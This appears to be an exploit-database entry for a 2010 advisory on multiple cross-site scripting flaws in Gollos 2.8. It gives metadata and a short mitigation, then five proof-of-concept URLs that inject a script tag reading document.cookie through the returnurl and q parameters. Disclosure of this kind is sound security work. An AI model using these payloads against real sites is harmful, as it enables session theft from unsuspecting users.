header-logo
Suggest Exploit
vendor:
Gollos
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: Gollos
Affected Version From: 2.8
Affected Version To: 2.8
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Gollos Multiple Cross-Site Scripting Vulnerabilities

Gollos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46379/info

Gollos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Gollos 2.8 is vulnerable; other versions may also be affected. 

http://www.example.com/?returnurl="><script>alert(document.cookie)</script>

http://www.example.com/register.aspx?returnurl="><script>alert(document.cookie)</script>

http://www.example.com/publication/info.aspx?pt=1&returnurl="><script>alert(document.cookie)</script>

http://www.example.com/user/add.aspx?returnurl="><script>alert(document.cookie)</script>user/add.aspx

http://www.example.com/product/list.aspx?q=1"><script>alert(document.cookie)</script>&x=0&y=0